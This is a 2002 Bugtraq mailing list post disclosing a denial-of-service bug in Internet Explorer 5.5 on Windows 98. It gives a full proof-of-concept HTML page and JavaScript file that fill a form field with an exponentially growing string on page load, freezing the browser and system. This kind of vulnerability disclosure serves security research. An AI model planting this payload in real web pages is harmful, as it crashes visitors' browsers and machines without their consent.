Bugtraq mailing list archives

IE FORM DOS


From: "Ivan Sergio Borgonovo" <mail () gorilla it>
Date: Tue, 15 Jan 2002 01:11:10 +0100

I was testing in a lame way whether an IIS app could be attacked by sending 
a long POST, and I realized IE is sensitive to a huge amount of data in 
<INPUT... > and <TEXTAREA> fields (maybe also others like SELECT).

Since nobody is willing to download a 10Mb page, I just thought I could 
fill the VALUE="" attribute with JavaScript.

-- begin test.html --

<html><title></title>
<body>

<script language="JavaScript" src="t.js"></script>

<FORM NAME="IEDos" METHOD="POST" ACTION="./">


<IMG SRC="1.gif" width='10' height='10' border='0'
    onLoad="FillTA(TA)">
<input type="text" name="TA" value="">


</FORM>

</body>
</html>

-- end test.html --


-- begin t.js --
<!--

function FillTA(obj) {
    v="a";
    for(i=0;i<100000000;i++) {
        v=v+v;
    };
     obj.value=v;
    return;
}

//-->

-- end t.js --


IE freezes, and if you have a few secs of patience the system freezes too.

IE 5.5 on W98 (I hope fully patched).

Commenting out obj.value=v, IE survives.

I've observed some protection errors too, but occasionally.



I hope this is not old news.





-- 
Ivan Sergio Borgonovo
Webmaster Gorilla.it http://www.gorilla.it
Tel. +39 02 26149225/26149008 Fax. +39 02 26149657
Via d'Apulia 11, 20125 Milano, Italy

